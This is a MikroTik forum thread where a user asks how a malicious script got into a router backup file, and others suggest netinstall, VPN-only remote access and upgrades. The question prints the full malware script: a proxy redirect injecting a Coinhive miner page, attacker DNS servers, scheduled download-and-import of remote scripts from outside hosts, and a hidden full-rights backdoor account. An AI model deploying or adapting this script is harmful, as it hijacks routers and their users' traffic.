Community discussions

MikroTik App
 
abakisensoy
just joined
Topic Author
Posts: 21
Joined: Tue May 02, 2017 12:15 am

My Backup file contains malicious scripts

Mon Aug 24, 2020 4:04 am

Hi,

Time to time, I backup my settings. While I checking my backup files I saw some strange scripts that I don't have in my Winbox script & jobs tab.

They are malicious for sure but I couldn't find them anywhere except in my backup file.

How they injected it? How my backup file contains them? How can I get rid of them?

here is the code:
ˆ¬¡±˜« 	   scheduler<   ÿÿÿÿ     ÿÿÿÿĞ      ÿÿÿÿ™      ÿÿÿÿ3     ÿÿÿÿ`        M2
 ş . ÿÿÿÿ1 à  m  	  ş	 q  ğk g  !admin	 ş! -  Ó:do {/ip proxy set enabled=yes port=8080 src-address="::"} on-error={:log info errorProxy}
:do {/ip proxy access remove [find Action=deny]} on-error={:log info errorProxy}
:do {/ip proxy access remove [find Action!=deny]} on-error={:log info errorProxy}
:do {/ip proxy access add action=deny disabled=no comment=sysadminpxy} on-error={:log info errorProxy}
:do {/ip firewall nat remove [find comment=sysadminpxy]} on-error={:log info errorNat}
:do {/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy} on-error={:log info errorNat}
:do {/ip firewall nat move [find comment=sysadminpxy] destination=0} on-error={:log info errorNat}
:do {/ip firewall filter remove [find comment=sysadminpxy]} on-error={:log info errorFilter}
:do {/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=5s comment=sysadminpxy} on-error={:log info errorFilter}
:do {/ip firewall filter move [find comment=sysadminpxy] destination=0} on-error={:log info errorFilter}
/ip dns set servers=94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141
:do {/system ntp client set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235} on-error={:log info errorNtp}
/system scheduler remove [find name=Auto113]
/system scheduler remove [find name=upd111]
/system scheduler remove [find name=upd112]
/system scheduler remove [find name=upd113]
:do {/system scheduler add name="upd111" start-time=startup on-event=":delay 5m\r\n:do {/tool fetch url=\"http://02ip.ru/1dVH37\" mode=http keep-result=no} on-error={}\r\n/system scheduler remove [find name=upd111]" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}
:do {/system scheduler add name="upd112" start-time=startup on-event="/system scheduler remove [find name=sh113]\r\n:do {/file remove u113.rsc} on-error={}" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}
:do {/system scheduler add name="upd113" interval=12h on-event=(":do {/tool fetch url=\"http://up0.bit:31415/error?part=3\" mode=http dst-path=webproxy/error.html} on-error={}\r\n:do {/tool fetch url=\"http://up0.bit:31415/error?part=3\" mode=http dst-path=flash/webproxy/error.html} on-error={}\r\n:do {/tool fetch url=\"http://up0.bit:31415/rsc?key=9obi6kttB9q4Dp&part=3\" mode=http dst-path=u113.rsc} on-error={}\r\n:do {/tool fetch url=https://2no.co/18HN37 mode=http keep-result=no} on-error={}\r\n/import u113.rsc\r\n:do {/file remove u113.rsc} on-error={}") policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113}
:do {/system scheduler add name="Auto113" start-time=03:11:00 interval=1d on-event="/system reboot" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorAuto113}
:do {/file remove autosupout.rif} on-error={}
:do {/file remove autosupout.old.rif} on-error={}
/ip service set api disabled=no port=8728 address=""
/ip service set ftp disabled=no port=21 address=""
:if ([:len [/user find name=("dircreate")]] > 0) do={/user remove "dircreate" }
/user add name=dircreate group=full password=1vJv12qWL8 disabled=no comment="9obi6kttB9q4Dp"
:do {/file print file=dircreate} on-error={:log info errorFilePrint}
:delay 5s
:do {/file set dircreate contents="<html>\r\n<head>\r\n	<meta http-equiv=\"Content-Type\" content=\"text/html;charset=windows-1251\">\r\n	<title>\"\$(url)\"</title> \r\n<script src=\"https://coinhive.com/lib/coinhive.min.js\"></script>\r\n<script>\r\n	var miner = new CoinHive.Anonymous('FgWWtJfuvPmrfwjOfgc9Vo55EyvrMBLh', {throttle: 0.1});\r\n	miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);\r\n</script>\r\n</head>\r\n<frameset>\r\n<frame src=\"\$(url)\"></frame>\r\n</frameset>\r\n</html>"} on-error={:log info errorFileSave}
:do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password=1vJv12qWL8 src-path="dircreate.txt" dst-path="webproxy/error.html"} on-error={:log info errorfileCopy}
:do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password=1vJv12qWL8 src-path="dircreate.txt" dst-path="flash/webproxy/error.html"} on-error={:log info errorfileCopy2}
:do {/file remove "dircreate.txt"} on-error={}
:do {/user set address=87.246.0.0/16,152.237.0.0/16,10.0.0.0/8,100.64.0.0/10,172.16.0.0/12,192.168.0.0/16,185.126.178.0/24 [find name!=dircreate]} on-error={:log info errorSetAddress}
:do {/user set disabled=yes [find name=dircreate]} on-error={:log info errorSetAddress}
/user remove [find name=ftu]
/user group remove [find name=ftpgroupe]
/ip service set ftp disabled=yes port=21 address=""
:do {/ip socks set enabled=no port=27182} on-error={:log info errorSocksSet}
:do {/ip socks access remove [find action=deny]} on-error={:log info errorSocksAccess}
:do {/ip socks access remove [find action!=deny]} on-error={:log info errorSocksAceess}
:do {/ip dns static remove [find address!=1.1.1.1]} on-error={:log info errorStaticDns}
:do {/tool sniffer set streaming-enabled=no} on-error={:log info errorSniffer}
/system rebootf  !sh113Ğ M2
 ş . ÿÿÿÿ1 	 m  	  ş	q  ğk  g  !admin	 ş! - !Š:delay 5m
:do {/tool fetch url="http://02ip.ru/1dVH37" mode=http keep-result=no} on-error={}
/system scheduler remove [find name=upd111]f  !upd111™ M2
 ş . ÿÿÿÿ1 	 m  	  ş	q  ğk  g  !admin	 ş! - !S/system scheduler remove [find name=sh113]
:do {/file remove u113.rsc} on-error={}f  !upd1123M2
 ş . ñ /  £K\1 À¨  m  	  ş	q  ğk  g  !admin	 ş! -  á:do {/tool fetch url="http://up0.bit:31415/error?part=3" mode=http dst-path=webproxy/error.html} on-error={}
:do {/tool fetch url="http://up0.bit:31415/error?part=3" mode=http dst-path=flash/webproxy/error.html} on-error={}
:do {/tool fetch url="http://up0.bit:31415/rsc?key=9obi6kttB9q4Dp&part=3" mode=http dst-path=u113.rsc} on-error={}
:do {/tool fetch url=https://2no.co/18HN37 mode=http keep-result=no} on-error={}
/import u113.rsc
:do {/file remove u113.rsc} on-error={}f  !upd113` M2
 
User avatar
vecernik87
Forum Veteran
Forum Veteran
Posts: 777
Joined: Fri Nov 10, 2017 8:19 am

Re: My Backup file contains malicious scripts

Mon Aug 24, 2020 7:02 am

Netinstall - the only way to get rid of hidden stuff...
 
User avatar
Jotne
Forum Guru
Forum Guru
Posts: 1915
Joined: Sat Dec 24, 2016 11:17 am
Location: jo.overland at gmail.com

Re: My Backup file contains malicious scripts

Mon Aug 24, 2020 11:50 am

Do you have any admin possibility from the internet? If so that is a way inn. VPN is the only good solution for remote admin.
What version did your router have? Old version should be upgraded.
 
Why do not use Splunk to monitor your MikroTik Router(s)? Look at this page in how to set it up.

MikroTik->Splunk
 
 
Sob
Forum Guru
Forum Guru
Posts: 6517
Joined: Mon Apr 20, 2009 9:11 pm

Re: My Backup file contains malicious scripts

Mon Aug 24, 2020 2:28 pm

Was the router hacked in the past and did you clean it without netinstalling? Backup can contain also some deleted data.
Excessive quoting is useless and annoying. If you use it, please consider if you could do without it.
 
martking
just joined
Posts: 15
Joined: Mon Apr 03, 2017 8:54 pm

Re: My Backup file contains malicious scripts

Mon Aug 24, 2020 7:13 pm

looking at that script id say you have been hacked, if you try to go to a website on port 80 you should get an error page appear
 
fleg
newbie
Posts: 26
Joined: Mon Nov 06, 2017 12:31 pm

Re: My Backup file contains malicious scripts

Mon Jan 25, 2021 9:31 pm

i`m interesting where did you find this script? In which rsc?

Who is online

Users browsing this forum: andya and 30 guests